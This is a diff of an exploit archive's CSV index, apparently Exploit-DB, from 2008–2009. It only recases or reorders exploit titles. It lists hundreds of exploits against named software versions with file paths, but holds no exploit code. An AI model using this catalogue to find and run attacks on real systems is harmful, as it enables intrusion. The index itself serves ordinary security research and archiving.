PoC (MS08-067)",2008-10-23,"stephen lawler",windows,dos,0 6825,platforms/windows/local/6825.pl,"VLC 0.9.4 - (.ty) Buffer Overflow (SEH)",2008-10-23,"Guido Landi",windows,local,0 -6826,platforms/php/webapps/6826.txt,"joomla component archaic binary gallery 0.2 - Directory Traversal",2008-10-24,H!tm@N,php,webapps,0 +6826,platforms/php/webapps/6826.txt,"joomla component archaic binary Gallery 0.2 - Directory Traversal",2008-10-24,H!tm@N,php,webapps,0 6827,platforms/php/webapps/6827.txt,"Joomla Component Kbase 1.0 - SQL Injection",2008-10-24,H!tm@N,php,webapps,0 6828,platforms/windows/remote/6828.html,"db Software Laboratory VImpX - (VImpX.ocx) Multiple Vulnerabilities",2008-10-24,shinnai,windows,remote,0 6829,platforms/php/webapps/6829.txt,"Aj RSS Reader - (EditUrl.php url) SQL Injection",2008-10-24,yassine_enp,php,webapps,0 @@ -6407,7 +6407,7 @@ id,file,description,date,author,platform,type,port 6839,platforms/php/webapps/6839.txt,"PozScripts Classified Auctions - (gotourl.php id) SQL Injection",2008-10-26,"Hussin X",php,webapps,0 6840,platforms/windows/remote/6840.html,"PowerTCP FTP module - Multiple Technique Exploit (SEH/HeapSpray)",2008-10-26,"Shahriyar Jalayeri",windows,remote,0 6841,platforms/windows/remote/6841.txt,"Microsoft Windows Server - Code Execution Exploit (MS08-067) (Universal)",2008-10-26,EMM,windows,remote,135 -6842,platforms/php/webapps/6842.txt,"WordPress Media Holder - (mediaHolder.php id) SQL Injection",2008-10-26,boom3rang,php,webapps,0 +6842,platforms/php/webapps/6842.txt,"Wordpress Media Holder - (mediaHolder.php id) SQL Injection",2008-10-26,boom3rang,php,webapps,0 6843,platforms/php/webapps/6843.txt,"SFS Ez Forum - (forum.php id) SQL Injection",2008-10-26,Hurley,php,webapps,0 6844,platforms/php/webapps/6844.pl,"MyForum 1.3 - (lecture.php id) SQL Injection",2008-10-26,Vrs-hCk,php,webapps,0 6845,platforms/cgi/webapps/6845.txt,"Ads Pro - 'dhtml.pl' Remote Command Execution Exploit",2008-10-26,S0l1D,cgi,webapps,0 @@ -6432,7 +6432,7 @@ id,file,description,date,author,platform,type,port 6864,platforms/cgi/webapps/6864.txt,"Sepal SPBOARD 4.5 - (board.cgi) Remote Command Execution",2008-10-29,GoLd_M,cgi,webapps,0 6865,platforms/php/webapps/6865.txt,"e107 plugin fm pro 1 - (File Disclosure / File Upload / Directory Traversal) Multiple Vulnerabilities",2008-10-29,GoLd_M,php,webapps,0 6866,platforms/php/webapps/6866.pl,"7Shop 1.1 - Arbitrary File Upload Exploit",2008-10-29,t0pP8uZz,php,webapps,0 -6867,platforms/php/webapps/6867.pl,"WordPress Plugin e-Commerce 3.4 - Arbitrary File Upload Exploit",2008-10-29,t0pP8uZz,php,webapps,0 +6867,platforms/php/webapps/6867.pl,"Wordpress Plugin e-Commerce 3.4 - Arbitrary File Upload Exploit",2008-10-29,t0pP8uZz,php,webapps,0 6868,platforms/php/webapps/6868.pl,"Mambo Component SimpleBoard 1.0.1 - Arbitrary File Upload Exploit",2008-10-29,t0pP8uZz,php,webapps,0 6869,platforms/php/webapps/6869.txt,"WebCards 1.3 - SQL Injection",2008-10-29,t0pP8uZz,php,webapps,0 6870,platforms/windows/remote/6870.html,"MW6 Aztec ActiveX - (Aztec.dll) Remote Insecure Method Exploit",2008-10-29,DeltahackingTEAM,windows,remote,0 @@ -6450,9 +6450,9 @@ id,file,description,date,author,platform,type,port 6882,platforms/php/webapps/6882.txt,"Absolute Podcast 1.0 - Remote Insecure Cookie Handling",2008-10-30,Hakxer,php,webapps,0 6883,platforms/php/webapps/6883.txt,"Absolute Poll Manager XE 4.1 - Cookie Handling",2008-10-30,Hakxer,php,webapps,0 6885,platforms/php/webapps/6885.txt,"e107 Plugin lyrics_menu - (lyrics_song.php l_id) SQL Injection",2008-10-31,ZoRLu,php,webapps,0 -6886,platforms/php/webapps/6886.txt,"Tribiq CMS 5.0.9a (beta) - Insecure Cookie Handling",2008-10-31,ZoRLu,php,webapps,0 +6886,platforms/php/webapps/6886.txt,"Tribiq CMS 5.0.9a (Beta) - Insecure Cookie Handling",2008-10-31,ZoRLu,php,webapps,0 6887,platforms/php/webapps/6887.txt,"Cybershade CMS 0.2b - Remote File Inclusion",2008-10-31,w0cker,php,webapps,0 -6888,platforms/php/webapps/6888.txt,"Tribiq CMS 5.0.10a - Local File Inclusion (Windows)",2008-10-31,GoLd_M,php,webapps,0 +6888,platforms/php/webapps/6888.txt,"Tribiq CMS 5.0.10a (Windows) - Local File Inclusion",2008-10-31,GoLd_M,php,webapps,0 6889,platforms/php/webapps/6889.txt,"Absolute Content Rotator 6.0 - Insecure Cookie Handling",2008-10-31,Hakxer,php,webapps,0 6890,platforms/php/webapps/6890.txt,"Absolute Banner Manager - Insecure Cookie Handling",2008-10-31,Hakxer,php,webapps,0 6891,platforms/php/webapps/6891.txt,"Absolute Form Processor 4.0 - Insecure Cookie Handling",2008-10-31,Hakxer,php,webapps,0 @@ -6647,7 +6647,7 @@ id,file,description,date,author,platform,type,port 7085,platforms/php/webapps/7085.txt,"PHPStore Real Estate - Remote File Upload",2008-11-10,ZoRLu,php,webapps,0 7086,platforms/php/webapps/7086.txt,"AJSquare Free Polling Script - (DB) Multiple Vulnerabilities",2008-11-10,G4N0K,php,webapps,0 7087,platforms/php/webapps/7087.txt,"AJ Auction Authentication - Bypass",2008-11-10,G4N0K,php,webapps,0 -7088,platforms/osx/dos/7088.txt,"smcFanControl 2.1.2 - Multiple Buffer Overflow Vulnerabilities PoC (OSX)",2008-11-11,xwings,osx,dos,0 +7088,platforms/osx/dos/7088.txt,"smcFanControl 2.1.2 (OSX) - Multiple Buffer Overflow Vulnerabilities PoC",2008-11-11,xwings,osx,dos,0 7089,platforms/php/webapps/7089.txt,"Aj Classifieds - Authentication Bypass",2008-11-11,G4N0K,php,webapps,0 7090,platforms/windows/dos/7090.txt,"ooVoo 1.7.1.35 - (URL Protocol) Remote Unicode Buffer Overflow PoC",2008-11-11,Nine:Situations:Group,windows,dos,0 7091,platforms/linux/dos/7091.c,"Linux Kernel < 2.4.36.9 / 2.6.27.5 - Unix Sockets Local Kernel Panic Exploit",2008-11-11,"Andrea Bittau",linux,dos,0 @@ -6707,7 +6707,7 @@ id,file,description,date,author,platform,type,port 7149,platforms/php/webapps/7149.php,"VideoScript 4.0.1.50 - Admin Change Password Exploit",2008-11-17,G4N0K,php,webapps,0 7150,platforms/linux/dos/7150.html,"CUPS 1.3.7 - Cross-Site Request Forgery (add rss subscription) Remote Crash Exploit",2008-11-18,"Adrian ""pagvac"" Pastor",linux,dos,0 7151,platforms/linux/remote/7151.c,"No-IP DUC 2.1.7 - Remote Code Execution Exploit",2008-11-18,XenoMuta,linux,remote,0 -7152,platforms/php/webapps/7152.txt,"Musicbox 2.3.8 - (viewalbums.php artistId) SQL Injection",2008-11-18,snakespc,php,webapps,0 +7152,platforms/php/webapps/7152.txt,"MusicBox 2.3.8 - (viewalbums.php artistId) SQL Injection",2008-11-18,snakespc,php,webapps,0 7153,platforms/php/webapps/7153.txt,"Pluck CMS 4.5.3 - (g_pcltar_lib_dir) Local File Inclusion",2008-11-18,DSecRG,php,webapps,0 7155,platforms/php/webapps/7155.txt,"Free Directory Script 1.1.1 - (API_HOME_DIR) Remote File Inclusion",2008-11-18,"Ghost Hacker",php,webapps,0 7156,platforms/php/webapps/7156.txt,"E-topbiz Link Back Checker 1 - Insecure Cookie Handling",2008-11-18,x0r,php,webapps,0 @@ -6764,7 +6764,7 @@ id,file,description,date,author,platform,type,port 7214,platforms/php/webapps/7214.txt,"ftpzik - (Cross-Site Scripting / Local File Inclusion) Multiple Vulnerabilities",2008-11-24,JIKO,php,webapps,0 7215,platforms/php/webapps/7215.txt,"bandwebsite 1.5 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-11-24,ZoRLu,php,webapps,0 7216,platforms/php/webapps/7216.txt,"WebStudio CMS - (index.php pageid) Blind SQL Injection",2008-11-24,"Glafkos Charalambous ",php,webapps,0 -7217,platforms/php/webapps/7217.pl,"Quicksilver Forums 1.4.2 - Remote Code Execution Exploit (Windows)",2008-11-24,girex,php,webapps,0 +7217,platforms/php/webapps/7217.pl,"Quicksilver Forums 1.4.2 (Windows) - Remote Code Execution Exploit",2008-11-24,girex,php,webapps,0 7218,platforms/php/webapps/7218.txt,"nitrotech 0.0.3a - (Remote File Inclusion / SQL Injection) Multiple Vulnerabilities",2008-11-24,Osirys,php,webapps,0 7219,platforms/windows/dos/7219.pl,"Total Video Player - (vcen.dll) Remote off by one Crash Exploit",2008-11-24,Cnaph,windows,dos,0 7220,platforms/hardware/dos/7220.txt,"Siemens C450IP/C475IP - Remote Denial of Service",2008-11-24,"sky & Any",hardware,dos,0 @@ -6789,7 +6789,7 @@ id,file,description,date,author,platform,type,port 7239,platforms/php/webapps/7239.txt,"ParsBlogger - (blog.asp wr) SQL Injection",2008-11-26,"BorN To K!LL",php,webapps,0 7240,platforms/php/webapps/7240.txt,"Star Articles 6.0 - Blind SQL Injection (1)",2008-11-26,b3hz4d,php,webapps,0 7241,platforms/php/webapps/7241.txt,"TxtBlog 1.0 Alpha - (index.php m) Local File Inclusion",2008-11-27,"CWH Underground",php,webapps,0 -7242,platforms/php/webapps/7242.txt,"web calendar system 3.12/3.30 - Multiple Vulnerabilities",2008-11-27,Bl@ckbe@rD,php,webapps,0 +7242,platforms/php/webapps/7242.txt,"web Calendar system 3.12/3.30 - Multiple Vulnerabilities",2008-11-27,Bl@ckbe@rD,php,webapps,0 7243,platforms/php/webapps/7243.php,"Star Articles 6.0 - Blind SQL Injection (2)",2008-11-27,Stack,php,webapps,0 7244,platforms/php/webapps/7244.txt,"Ocean12 Contact Manager Pro - (SQL Injection / Cross-Site Scripting / File Disclosure) Multiple Vulnerabilities",2008-11-27,Pouya_Server,php,webapps,0 7245,platforms/php/webapps/7245.txt,"Ocean12 Membership Manager Pro - Database Disclosure",2008-11-27,Pouya_Server,php,webapps,0 @@ -6802,7 +6802,7 @@ id,file,description,date,author,platform,type,port 7252,platforms/php/webapps/7252.txt,"Web Calendar 4.1 - (Authentication Bypass) SQL Injection",2008-11-27,Cyber-Zone,php,webapps,0 7253,platforms/php/webapps/7253.txt,"Booking Centre 2.01 - (HotelID) SQL Injection",2008-11-27,R3d-D3V!L,php,webapps,0 7254,platforms/php/webapps/7254.txt,"Ocean12 Membership Manager Pro - (Authentication Bypass) SQL Injection",2008-11-27,Cyber-Zone,php,webapps,0 -7255,platforms/php/webapps/7255.txt,"pagetree CMS 0.0.2 beta 0001 - Remote File Inclusion",2008-11-27,NoGe,php,webapps,0 +7255,platforms/php/webapps/7255.txt,"pagetree CMS 0.0.2 Beta 0001 - Remote File Inclusion",2008-11-27,NoGe,php,webapps,0 7256,platforms/php/webapps/7256.txt,"Turnkey Arcade Script - 'id' SQL Injection (1)",2008-11-27,The_5p3ctrum,php,webapps,0 7258,platforms/php/webapps/7258.txt,"Ocean12 FAQ Manager Pro - Database Disclosure",2008-11-27,Stack,php,webapps,0 7259,platforms/asp/webapps/7259.txt,"comersus asp shopping cart - (File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities",2008-11-27,Bl@ckbe@rD,asp,webapps,0 @@ -6811,7 +6811,7 @@ id,file,description,date,author,platform,type,port 7262,platforms/windows/dos/7262.pl,"Microsoft Office - Communicator (SIP) Remote Denial of Service",2008-11-28,"Praveen Darshanam",windows,dos,0 7263,platforms/php/webapps/7263.txt,"Booking Centre 2.01 - (Authentication Bypass) SQL Injection",2008-11-28,MrDoug,php,webapps,0 7264,platforms/windows/local/7264.txt,"Apache Tomcat (Windows) - runtime.getRuntime().exec() Privilege Escalation",2008-11-28,Abysssec,windows,local,0 -7265,platforms/php/webapps/7265.txt,"web calendar system 3.40 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2008-11-28,Bl@ckbe@rD,php,webapps,0 +7265,platforms/php/webapps/7265.txt,"web Calendar system 3.40 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2008-11-28,Bl@ckbe@rD,php,webapps,0 7266,platforms/php/webapps/7266.pl,"All Club CMS 0.0.2 - Remote DB Config Retrieve Exploit",2008-11-28,StAkeR,php,webapps,0 7267,platforms/php/webapps/7267.txt,"SailPlanner 0.3a - (Authentication Bypass) SQL Injection",2008-11-28,JIKO,php,webapps,0 7268,platforms/php/webapps/7268.txt,"Bluo CMS 1.2 - (index.php id) Blind SQL Injection",2008-11-28,The_5p3ctrum,php,webapps,0 @@ -6864,7 +6864,7 @@ id,file,description,date,author,platform,type,port 7317,platforms/php/webapps/7317.pl,"bcoos 1.0.13 - (viewcat.php cid) SQL Injection",2008-12-01,"CWH Underground",php,webapps,0 7318,platforms/php/webapps/7318.txt,"PacPoll 4.0 - (poll.mdb/poll97.mdb) Database Disclosure",2008-12-01,AlpHaNiX,php,webapps,0 7319,platforms/php/webapps/7319.txt,"Ocean12 Mailing List Manager Gold - DD / SQL / Cross-Site Scripting",2008-12-02,Pouya_Server,php,webapps,0 -7322,platforms/php/webapps/7322.pl,"CMS MAXSITE Component Guestbook - Remote Command Execution Exploit",2008-12-02,"CWH Underground",php,webapps,0 +7322,platforms/php/webapps/7322.pl,"CMS MAXSITE Component GuestBook - Remote Command Execution Exploit",2008-12-02,"CWH Underground",php,webapps,0 7323,platforms/php/webapps/7323.txt,"SunByte e-Flower - 'id' SQL Injection",2008-12-02,w4rl0ck,php,webapps,0 7324,platforms/php/webapps/7324.txt,"Rapid Classified 3.1 - (cldb.mdb) Database Disclosure",2008-12-02,CoBRa_21,php,webapps,0 7325,platforms/asp/webapps/7325.txt,"Codefixer MailingListPro (MailingList.mdb) - Database Disclosure",2008-12-02,AlpHaNiX,asp,webapps,0 @@ -6876,7 +6876,7 @@ id,file,description,date,author,platform,type,port 7331,platforms/php/webapps/7331.pl,"Joomla Component com_jmovies 1.1 - 'id' SQL Injection",2008-12-03,StAkeR,php,webapps,0 7332,platforms/php/webapps/7332.txt,"ASP User Engine .NET - Remote Database Disclosure",2008-12-03,AlpHaNiX,php,webapps,0 7333,platforms/php/webapps/7333.txt,"Rae Media Contact MS - (Authentication Bypass) SQL Injection",2008-12-03,b3hz4d,php,webapps,0 -7334,platforms/windows/local/7334.pl,"RadAsm 2.2.1.5 - (.RAP) WindowCallProcA Pointer Hijack Exploit",2008-12-03,DATA_SNIPER,windows,local,0 +7334,platforms/windows/local/7334.pl,"RadASM 2.2.1.5 - (.RAP) WindowCallProcA Pointer Hijack Exploit",2008-12-03,DATA_SNIPER,windows,local,0 7335,platforms/php/webapps/7335.txt,"Multi SEO phpBB 1.1.0 - (pfad) Remote File Inclusion",2008-12-03,NoGe,php,webapps,0 7336,platforms/php/webapps/7336.txt,"ccTiddly 1.7.4 - (cct_base) Multiple Remote File Inclusion",2008-12-04,cOndemned,php,webapps,0 7337,platforms/php/webapps/7337.txt,"wbstreet 1.0 - (SQL Injection / File Disclosure) Multiple Vulnerabilities",2008-12-04,"CWH Underground",php,webapps,0 @@ -7029,7 +7029,7 @@ id,file,description,date,author,platform,type,port 7485,platforms/asp/webapps/7485.txt,"clickandemail - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-12-15,AlpHaNiX,asp,webapps,0 7486,platforms/asp/webapps/7486.txt,"click&rank - SQL / Cross-Site Scripting",2008-12-15,AlpHaNiX,asp,webapps,0 7487,platforms/php/webapps/7487.txt,"FaScript FaUpload - 'download.php' SQL Injection",2008-12-16,"Aria-Security Team",php,webapps,0 -7488,platforms/asp/webapps/7488.txt,"Web Wiz Guestbook 8.21 - (WWGguestbook.mdb) DD",2008-12-16,"Cold Zero",asp,webapps,0 +7488,platforms/asp/webapps/7488.txt,"Web Wiz GuestBook 8.21 - (WWGguestbook.mdb) DD",2008-12-16,"Cold Zero",asp,webapps,0 7489,platforms/php/webapps/7489.pl,"FLDS 1.2a - report.php (linkida) SQL Injection",2008-12-16,ka0x,php,webapps,0 7490,platforms/php/webapps/7490.php,"Aiyoota! CMS - Blind SQL Injection",2008-12-16,Lidloses_Auge,php,webapps,0 7491,platforms/asp/webapps/7491.txt,"Nukedit 4.9.8 - Remote Database Disclosure",2008-12-16,Cyber.Zer0,asp,webapps,0 @@ -7061,7 +7061,7 @@ id,file,description,date,author,platform,type,port 7518,platforms/php/webapps/7518.txt,"Gobbl CMS 1.0 - Insecure Cookie Handling",2008-12-18,x0r,php,webapps,0 7519,platforms/php/webapps/7519.txt,"MyPHPsite - (index.php mod) Local File Inclusion",2008-12-18,Piker,php,webapps,0 7520,platforms/multiple/dos/7520.c,"Avahi < 0.6.24 - (mDNS Daemon) Remote Denial of Service",2008-12-19,"Jon Oberheide",multiple,dos,0 -7521,platforms/windows/remote/7521.txt,"webcamXP 5.3.2.375 - Remote File Disclosure",2008-12-19,nicx0,windows,remote,0 +7521,platforms/windows/remote/7521.txt,"WebcamXP 5.3.2.375 - Remote File Disclosure",2008-12-19,nicx0,windows,remote,0 7522,platforms/php/webapps/7522.pl,"MyPBS - (index.php seasonID) SQL Injection",2008-12-19,Piker,php,webapps,0 7523,platforms/php/webapps/7523.php,"ReVou Twitter Clone - Admin Password Changing Exploit",2008-12-19,G4N0K,php,webapps,0 7524,platforms/php/webapps/7524.txt,"Online Keyword Research Tool - 'download.php' File Disclosure",2008-12-19,"Cold Zero",php,webapps,0 @@ -7074,7 +7074,7 @@ id,file,description,date,author,platform,type,port 7531,platforms/php/webapps/7531.txt,"ReVou Twitter Clone - Arbitrary File Upload",2008-12-21,S.W.A.T.,php,webapps,0 7532,platforms/php/webapps/7532.txt,"chicomas 2.0.4 - (Database Backup/File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities",2008-12-21,BugReport.IR,php,webapps,0 7533,platforms/windows/local/7533.txt,"PowerStrip 3.84 - (pstrip.sys) Privilege Escalation",2008-12-21,"NT Internals",windows,local,0 -7534,platforms/asp/webapps/7534.txt,"Emefa Guestbook 3.0 - Remote Database Disclosure",2008-12-21,Cyber.Zer0,asp,webapps,0 +7534,platforms/asp/webapps/7534.txt,"Emefa GuestBook 3.0 - Remote Database Disclosure",2008-12-21,Cyber.Zer0,asp,webapps,0 7535,platforms/hardware/dos/7535.php,"Linksys Wireless ADSL Router (WAG54G v2) - httpd Denial of Service",2008-12-21,r0ut3r,hardware,dos,0 7536,platforms/windows/local/7536.cpp,"CoolPlayer 2.19 - (.Skin) Local Buffer Overflow",2008-12-21,r0ut3r,windows,local,0 7537,platforms/php/webapps/7537.txt,"BLOG 1.55B - (image_upload.php) Arbitrary File Upload",2008-12-21,Piker,php,webapps,0 @@ -7083,19 +7083,19 @@ id,file,description,date,author,platform,type,port 7540,platforms/php/webapps/7540.txt,"phpg 1.6 - (Cross-Site Scripting / Full Path Disclosure/Denial of Service) Multiple Vulnerabilities",2008-12-21,"Anarchy Angel",php,webapps,0 7541,platforms/php/webapps/7541.pl,"RSS Simple News - (news.php pid) SQL Injection",2008-12-22,Piker,php,webapps,0 7542,platforms/php/webapps/7542.txt,"Text Lines Rearrange Script - (filename) File Disclosure",2008-12-22,SirGod,php,webapps,0 -7543,platforms/php/webapps/7543.txt,"WordPress Plugin Page Flip Image Gallery 0.2.2 - Remote FD",2008-12-22,GoLd_M,php,webapps,0 +7543,platforms/php/webapps/7543.txt,"Wordpress Plugin Page Flip Image Gallery 0.2.2 - Remote FD",2008-12-22,GoLd_M,php,webapps,0 7544,platforms/php/webapps/7544.txt,"Pligg 9.9.5b - (check_url.php url) Arbitrary File Upload / SQL Injection",2008-12-22,Ams,php,webapps,0 7545,platforms/php/webapps/7545.txt,"yourplace 1.0.2 - Multiple Vulnerabilities / Remote Code Execution Exploit",2008-12-22,Osirys,php,webapps,0 7546,platforms/php/webapps/7546.txt,"Joomla Component Volunteer 2.0 - (job_id) SQL Injection",2008-12-22,boom3rang,php,webapps,0 7547,platforms/windows/local/7547.py,"CoolPlayer 2.19 - (.Skin) Local Buffer Overflow (Python)",2008-12-22,"Encrypt3d.M!nd ",windows,local,0 7548,platforms/php/webapps/7548.php,"SolarCMS 0.53.8 - (Forum) Remote Cookies Disclosure Exploit",2008-12-22,StAkeR,php,webapps,0 -7549,platforms/php/webapps/7549.txt,"RoundCube Webmail 0.2-3 beta - Code Execution",2008-12-22,"Jacobo Avariento",php,webapps,0 +7549,platforms/php/webapps/7549.txt,"RoundCube Webmail 0.2-3 Beta - Code Execution",2008-12-22,"Jacobo Avariento",php,webapps,0 7550,platforms/multiple/local/7550.c,"CUPS < 1.3.8-4 - (pstopdf filter) Privilege Escalation",2008-12-22,"Jon Oberheide",multiple,local,0 7551,platforms/php/webapps/7551.txt,"Calendar Script 1.1 - (Authentication Bypass) SQL Injection",2008-12-22,StAkeR,php,webapps,0 7552,platforms/php/webapps/7552.txt,"REDPEACH CMS - (zv) SQL Injection",2008-12-22,Lidloses_Auge,php,webapps,0 7553,platforms/php/webapps/7553.sh,"RoundCube Webmail 0.2b - Remote Code Execution Exploit",2008-12-22,Hunger,php,webapps,0 7554,platforms/windows/dos/7554.pl,"Mozilla Firefox 3.0.5 - location.hash Remote Crash Exploit",2008-12-23,"Jeremy Brown",windows,dos,0 -7555,platforms/multiple/dos/7555.py,"Psi Jabber Client - (8010/tcp) Remote Denial of Service (Windows/Linux)",2008-12-23,Sha0,multiple,dos,0 +7555,platforms/multiple/dos/7555.py,"Psi Jabber Client (Windows / Linux) - (8010/tcp) Remote Denial of Service",2008-12-23,Sha0,multiple,dos,0 7556,platforms/windows/dos/7556.php,"PGP Desktop 9.0.6 - (PGPwded.sys) Local Denial of Service",2008-12-23,Evilcry,windows,dos,0 7557,platforms/php/webapps/7557.txt,"PHPmotion 2.1 - Cross-Site Request Forgery",2008-12-23,Ausome1,php,webapps,0 7558,platforms/php/webapps/7558.txt,"phpLD 3.3 - (page.php name) Blind SQL Injection",2008-12-23,fuzion,php,webapps,0 @@ -7172,7 +7172,7 @@ id,file,description,date,author,platform,type,port 7632,platforms/hardware/dos/7632.txt,"Nokia S60 SMS/MMS (Curse of Silence) - Denial of Service",2009-01-01,"Tobias Engel",hardware,dos,0 7633,platforms/php/webapps/7633.txt,"EggBlog 3.1.10 - Change Admin Pass Cross-Site Request Forgery",2009-01-01,x0r,php,webapps,0 7634,platforms/windows/dos/7634.pl,"Audacity 1.2.6 - (.gro) Local Buffer Overflow PoC",2009-01-01,Houssamix,windows,dos,0 -7635,platforms/php/webapps/7635.txt,"ASPThai.Net Webboard 6.0 - (bview.asp) SQL Injection",2009-01-01,DaiMon,php,webapps,0 +7635,platforms/php/webapps/7635.txt,"ASPThai.Net WebBoard 6.0 - (bview.asp) SQL Injection",2009-01-01,DaiMon,php,webapps,0 7636,platforms/php/webapps/7636.pl,"PHPFootball 1.6 - (filter.php) Remote Hash Disclosure Exploit",2009-01-01,KinG-LioN,php,webapps,0 7637,platforms/windows/dos/7637.pl,"Elecard MPEG Player 5.5 - '.m3u' Stack Buffer Overflow PoC",2009-01-01,"aBo MoHaMeD",windows,dos,0 7638,platforms/php/webapps/7638.txt,"Memberkit 1.0 - Remote PHP File Upload",2009-01-01,Lo$er,php,webapps,0 @@ -7184,7 +7184,7 @@ id,file,description,date,author,platform,type,port 7644,platforms/php/webapps/7644.txt,"Built2Go PHP Link Portal 1.95.1 - Remote File Upload",2009-01-02,ZoRLu,php,webapps,0 7645,platforms/php/webapps/7645.txt,"Built2Go PHP Rate My Photo 1.46.4 - Remote File Upload",2009-01-02,ZoRLu,php,webapps,0 7646,platforms/multiple/local/7646.txt,"PHP 5.2.8 gd library - imageRotate() Information Leak",2009-01-02,"Hamid Ebadi",multiple,local,0 -7647,platforms/multiple/dos/7647.txt,"VMware 2.5.1 - (Vmware-authd) Remote Denial of Service",2009-01-02,"laurent gaffié ",multiple,dos,0 +7647,platforms/multiple/dos/7647.txt,"VMware 2.5.1 - (VMware-authd) Remote Denial of Service",2009-01-02,"laurent gaffié ",multiple,dos,0 7648,platforms/php/webapps/7648.txt,"phpskelsite 1.4 - (Remote File Inclusion / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2009-01-02,ahmadbady,php,webapps,0 7649,platforms/windows/dos/7649.pl,"Destiny Media Player 1.61 - '.m3u' Local Buffer Overflow PoC",2009-01-02,"aBo MoHaMeD",windows,dos,0 7650,platforms/php/webapps/7650.php,"Lito Lite CMS - Multiple Cross-Site Scripting / Blind SQL Injection",2009-01-03,darkjoker,php,webapps,0 @@ -7275,7 +7275,7 @@ id,file,description,date,author,platform,type,port 7735,platforms/php/webapps/7735.pl,"Simple Machines Forum 1.0.13 / 1.1.5 - 'Destroyer 0.1' Password Reset Security Bypass",2009-01-12,Xianur0,php,webapps,0 7736,platforms/asp/webapps/7736.htm,"Comersus Shopping Cart 6.0 - Remote User Pass Exploit",2009-01-12,ajann,asp,webapps,0 7737,platforms/windows/dos/7737.py,"Triologic Media Player 7 - '.m3u' Local Heap Buffer Overflow PoC",2009-01-12,zAx,windows,dos,0 -7738,platforms/php/webapps/7738.txt,"WordPress Plugin WP-Forum 1.7.8 - SQL Injection",2009-01-12,seomafia,php,webapps,0 +7738,platforms/php/webapps/7738.txt,"Wordpress Plugin WP-Forum 1.7.8 - SQL Injection",2009-01-12,seomafia,php,webapps,0 7739,platforms/windows/remote/7739.html,"ExcelOCX ActiveX 3.2 - Download File Insecure Method Exploit",2009-01-12,"Alfons Luja",windows,remote,0 7740,platforms/php/webapps/7740.txt,"PWP Wiki Processor 1-5-1 - Remote File Upload",2009-01-12,ahmadbady,php,webapps,0 7741,platforms/asp/webapps/7741.txt,"dMx READY (25 - Products) Remote Database Disclosure",2009-01-12,Cyber-Zone,asp,webapps,0 @@ -7430,7 +7430,7 @@ id,file,description,date,author,platform,type,port 7894,platforms/php/webapps/7894.txt,"Chipmunk Blog - (Authentication Bypass) Add Admin Exploit",2009-01-28,x0r,php,webapps,0 7895,platforms/php/webapps/7895.txt,"Gazelle CMS - (template) Local File Inclusion",2009-01-28,fuzion,php,webapps,0 7896,platforms/php/webapps/7896.php,"Lore 1.5.6 - 'article.php' Blind SQL Injection",2009-01-28,OzX,php,webapps,0 -7897,platforms/php/webapps/7897.php,"phplist 2.10.x - (Remote Code Execution by environ inclusion) Local File Inclusion Exploit",2009-01-28,mozi,php,webapps,0 +7897,platforms/php/webapps/7897.php,"phpList 2.10.x - (Remote Code Execution by environ inclusion) Local File Inclusion Exploit",2009-01-28,mozi,php,webapps,0 7898,platforms/php/webapps/7898.txt,"Max.Blog 1.0.6 - (submit_post.php) SQL Injection",2009-01-28,"Salvatore Fresta",php,webapps,0 7899,platforms/php/webapps/7899.txt,"Max.Blog 1.0.6 - (offline_auth.php) Offline Authentication Bypass",2009-01-28,"Salvatore Fresta",php,webapps,0 7900,platforms/php/webapps/7900.txt,"Social Engine - (category_id) SQL Injection",2009-01-28,snakespc,php,webapps,0 @@ -7448,7 +7448,7 @@ id,file,description,date,author,platform,type,port 7913,platforms/windows/remote/7913.pl,"WFTPD Explorer Pro 1.0 - Remote Heap Overflow",2009-01-29,SkD,windows,remote,21 7915,platforms/hardware/remote/7915.txt,"Motorola Wimax modem CPEi300 - (File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities",2009-01-29,"Usman Saeed",hardware,remote,0 7916,platforms/php/webapps/7916.txt,"NetArtMedia Car Portal 1.0 - (Authentication Bypass) SQL Injection",2009-01-29,"Mehmet Ince",php,webapps,0 -7917,platforms/php/webapps/7917.php,"PLE CMS 1.0 beta 4.2 - (login.php school) Blind SQL Injection",2009-01-29,darkjoker,php,webapps,0 +7917,platforms/php/webapps/7917.php,"PLE CMS 1.0 Beta 4.2 - (login.php school) Blind SQL Injection",2009-01-29,darkjoker,php,webapps,0 7918,platforms/windows/remote/7918.txt,"ManageEngine Firewall Analyzer 5 - Cross-Site Request Forgery / Cross-Site Scripting",2009-01-29,"Michael Brooks",windows,remote,0 7919,platforms/windows/remote/7919.txt,"Profense Web Application Firewall 2.6.2 - Cross-Site Request Forgery / Cross-Site Scripting",2009-01-29,"Michael Brooks",windows,remote,0 7920,platforms/hardware/remote/7920.txt,"D-Link VoIP Phone Adapter - Cross-Site Scripting / Cross-Site Request Forgery Remote Firmware Overwrite",2009-01-29,"Michael Brooks",hardware,remote,0 @@ -7469,7 +7469,7 @@ id,file,description,date,author,platform,type,port 7935,platforms/windows/remote/7935.html,"Google Chrome 1.0.154.46 - (ChromeHTML://) Parameter Injection PoC",2009-01-30,waraxe,windows,remote,0 7936,platforms/php/webapps/7936.txt,"sma-db 0.3.12 - (Remote File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2009-02-02,ahmadbady,php,webapps,0 7938,platforms/php/webapps/7938.txt,"Flatnux 2009-01-27 - (Job fields) Cross-Site Scripting / Iframe Injection PoC",2009-02-02,"Alfons Luja",php,webapps,0 -7939,platforms/php/webapps/7939.txt,"AJA Portal 1.2 - Local File Inclusion (Windows)",2009-02-02,ahmadbady,php,webapps,0 +7939,platforms/php/webapps/7939.txt,"AJA Portal 1.2 (Windows) - Local File Inclusion",2009-02-02,ahmadbady,php,webapps,0 7940,platforms/php/webapps/7940.txt,"WholeHogSoftware Ware Support - (Authentication Bypass) SQL Injection",2009-02-02,ByALBAYX,php,webapps,0 7941,platforms/php/webapps/7941.txt,"WholeHogSoftware Password Protect - (Authentication Bypass) SQL Injection",2009-02-02,ByALBAYX,php,webapps,0 7942,platforms/windows/dos/7942.pl,"Elecard AVC HD PLAYER - (.m3u/.xpl) Local Stack Overflow PoC",2009-02-02,AlpHaNiX,windows,dos,0 @@ -7485,7 +7485,7 @@ id,file,description,date,author,platform,type,port 